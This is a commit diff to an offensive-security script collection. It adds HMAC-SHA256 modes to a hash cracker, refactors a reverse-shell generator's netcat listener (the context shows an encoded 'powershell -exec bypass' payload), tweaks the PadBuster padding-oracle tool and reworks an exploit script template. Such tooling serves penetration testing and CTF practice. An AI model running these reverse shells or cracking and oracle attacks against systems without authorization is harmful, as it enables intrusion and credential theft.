Update

crack_hash.py

@@ -33,6 +33,8 @@ class HashType(enum.Enum):
     RAW_SHA2_256 = 1400
     SHA256_PASS_SALT = 1410
     SHA256_SALT_PASS = 1420
+    HMAC_SHA256_PASS = 1450
+    HMAC_SHA256_SALT = 1460
     RAW_SHA2_384 = 10800
     RAW_SHA2_512 = 1700
     SHA512_PASS_SALT = 1710
@@ -181,6 +183,8 @@ class Hash:
                 if self.isSalted:
                     self.type.append(HashType.SHA256_PASS_SALT)
                     self.type.append(HashType.SHA256_SALT_PASS)
+                    self.type.append(HashType.HMAC_SHA256_PASS)
+                    self.type.append(HashType.HMAC_SHA256_SALT)
                 else:
                     self.type.append(HashType.RAW_SHA2_256)
                     self.type.append(HashType.RAW_SHA3_256)

genRevShell.py

@@ -36,13 +36,16 @@ def generatePayload(type, local_address, port):
         payload_encoded = base64.b64encode(payload.encode("UTF-16LE")).decode()
         return f"powershell.exe -exec bypass -enc {payload_encoded}"
 
+def spawn_listener(port):
+    pty.spawn(["nc", "-lvvp", str(port)])
+
 def triggerShell(func, port):
     def _wait_and_exec():
         time.sleep(1.5)
         func()
 
     threading.Thread(target=_wait_and_exec).start()
-    pty.spawn(["nc", "-lvvp", str(port)])
+    spawn_listener(port)
 
 
 if __name__ == "__main__":

padBuster.pl

@@ -527,7 +527,7 @@ sub processBlock {
 
 				my $continue = "y";
 
-				if (($error && $content !~ /$error/) || ($oracleSignature ne "" && $oracleSignature ne $signatureData)) {
+				if (($error && $content !~ /$error/ && $location !~ /$error/) || ($oracleSignature ne "" && $oracleSignature ne $signatureData)) {
 					# This is for autoretry logic (only works on the first byte)
 					if ($autoRetry == 1 &&  ($byteNum == ($blockSize - 1) ) && $hasHit == 0 ) {
 						$hasHit++;

template.py

@@ -5,36 +5,34 @@ import sys
 def generateTemplate(baseUrl):
     template = """#!/usr/bin/env python
 
+import os
 import sys
 import json
 import base64
 import requests
+import subprocess
+import urllib.parse
 from bs4 import BeautifulSoup
-from hackingscripts import util, fileserver
+from hackingscripts import util, fileserver, genRevShell
 
 from urllib3.exceptions import InsecureRequestWarning
 requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
 
 BASE_URL = "%s" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
-USERNAME = "admin"
-PASSWORD = "password"
-
-def login(username, password):
-    session = requests.Session()
-    post_data = { "username": username, "password": password }
-    res = session.post(f"{BASE_URL}/login", data=post_data, allow_redirects=False)
-    if res.status_code != 302 or "Location" not in res.headers or res.headers["Location"] != "/home":
-        print("Login failed")
-        exit()
-    return session
 
-def exploit(session, payload):
-    # Template method to exploit an endpoint
-    pass
+def request(method, uri, **kwargs):
+    if not uri.startswith("/") and uri != "":
+        uri = "/" + uri
+
+    client = requests
+    if "session" in kwargs:
+        client = kwargs["session"]
+        del kwargs["session"]
+
+    return client.request(method, BASE_URL + uri, verify=False, allow_redirects=False, **kwargs)
 
 if __name__ == "__main__":
-    session = login(USERNAME, PASSWORD)
-    exploit(session, "id")
+    pass
 """ % baseUrl
 
     return template